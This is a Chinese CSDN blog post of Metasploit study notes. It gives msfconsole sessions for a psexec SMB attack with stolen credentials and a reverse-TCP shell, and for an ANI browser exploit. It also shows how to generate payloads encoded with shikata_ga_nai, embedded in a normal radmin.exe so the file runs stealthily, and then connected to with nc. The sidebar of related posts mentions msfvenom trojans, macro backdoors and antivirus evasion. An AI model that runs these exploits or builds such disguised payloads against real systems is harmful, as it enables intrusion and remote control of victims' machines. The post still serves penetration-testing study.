msf学习笔记(2)

最新推荐文章于 2024-05-18 13:47:02 发布
最新推荐文章于 2024-05-18 13:47:02 发布
阅读量529 收藏 3
点赞数
分类专栏: MSF学习笔记 文章标签: MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianyazm/article/details/78427064
版权

exploit分类

Active exploit

示例:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.1.100
rhost => 192.168.1.100
msf exploit(psexec) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(psexec) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > set smbuser user1 #需要客户机账户名
smbuser => user1
msf exploit(psexec) > set smbpass pass1 #需要客户机密码
smbpass => pass1
msf exploit(psexec) > exploit

Passive exploit

示例:

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize      ##引导点击网址漏洞
msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.1.100
srvhost => 192.168.1.100
msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(ms07_017_ani_loadimage_chunksize) > set lport 4444
lport => 4444
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit

生成payload

msf payload(shell_bind_tcp) > generate  #生成payload(RB语言)
msf payload(shell_bind_tcp) > generate -b '\x00'        #过滤坏字符(编码方式)
msf > show encoders     #显示编码方式
msf payload(shell_bind_tcp) > generate -e php/base64        #手动指定编码方式

payload示例

msf payload(shell_bind_tcp) > generate -b  'x00' -t exe  -e x86/shikata_ga_nai -i 5 -k -x /user/share/windows-binaries/radmin.exe -f  /root/1.exe
#-b 排除坏字符
#-t 生成文件类型
#-e 使用编码方式
#-i 编码次数
#-k 隐蔽运营
#-x 使用正常文件模板(正常运行程序)
#-f 输出文件

控制机

nc 192.168.1.100 4444

NOP(字节滑动)
no-operation / Next Operation(无任何操作)

generate -s 14  #插入14个NOP
generate -t c   #C语言格式
tianyazm
关注
专栏目录
MSF学习
willow_liang的博客
12-03 1971
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
MSF学习笔记(10)
Shadow 爬爬记
12-11 699
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf学习之旅
12306小哥
11-11 947
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。 Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040) #msfconsole msf > search ms06-040 msf > use ...
MSF学习笔记
mohanhan
06-24 384
使用MSF生成木马_入侵win7 1 生成木马 先通过kali自带功能生成一个木马(123.exe) -f 输出格式 -o 输出地址 生成木马一般需要点时间 2 启动msf msfconsole 然后进行设置攻击参数&&启动攻击 3 让123.exe在目标机器执行 模拟黑客或是社工手法(这里方法多种多样),让木马文件123.exe在目标win7上运行 4 查看监听回显数据 木马已经运行了,现在返回msf 查看,发现建立了一条会话,查看下windows系统信息 5 后续操作 截取
MSF学习笔记(11)
Shadow 爬爬记
02-12 936
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1336
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
msf学习笔记(4)
Shadow 爬爬记
11-03 1100
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
msf学习笔记(5)
Shadow 爬爬记
11-03 441
MSF弱点扫描vnc密码破解use auxiliary/scanner/vnc/vnc_loginvnc无密码访问use auxiliary/scanner/vnc/vnc_none_authRDP远程桌面漏洞use auxiliary/scanner/rdp/ms12_020_check设备后门use auxiliary/scanner/ssh/juniper_backdoor use auxil
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 3007
Metasploit初体验(一)
2024最新最全【MSF基础与应用】零基础入门到精通,看完这一篇就够了!
最新发布
wholeliubei的博客
05-18 501
Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。
Metasploit(MSF)基础超级详细版
热门推荐
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 3615
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
MSF渗透实验
weixin_51646864的博客
08-11 1476
浏览器攻击渗透(MS10_018) 环境: 1、虚拟机Windows2003系统(靶机) 2、虚拟机linux2020.2(攻击机) 步骤: 一、启动虚拟机linux2020.2,终端输入msfconsole启动 二、输入指令search ms10_018查看一下,这是2010年的浏览器漏洞。 三、接下来搜索ie浏览器:输入指令search ie 回车后可以看到关于ie浏览器历史漏洞 四、这里选择2010年的漏洞进行实验。输入指令: use exploit/windows/browser/ms10_0
msf的reverse_tcp和bind_tcp两者的区别
HoAd'blog
07-31 5856
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
渗透测试-window反弹shell
lza20001103的博客
05-11 4703
window反弹shell
免杀技术实际演示
分享学习网络的点点滴滴
11-21 565
● 编码后的程序会降低一定的检测率,但由于加密程序过于有名,所以效果不明显 ● 利用模板隐藏shell ● 利用模板隐藏进行加密 ● 软件开发商为保护版权,采用混淆和加密软件避免盗版逆向 ● 常被恶意软件用于免杀目的● Crypter / Container(解密器+PE Loader) 这样生成的程序,会进一步降低被杀概率 Linux shell 说明是可用的● 而且是免杀的,无法被检测出来
MSF利用
m0_73927535的博客
03-24 1080
漏洞检测程序,只检测漏洞是否存在:漏洞利用程序,真正发起攻击的行为,kali中集成了很多EXP,代码文件目录:/usr/share/metasploit-framework/modules/exploits:攻击主机主动去连接被攻击主机,比如我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,防火墙对进入主机某些端口的数据限制是很严的,一般防火墙都是进口的数据限制严格,出口的数据限制相对没有那么严格。
msf 渗透工具学习材料
08-20
2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值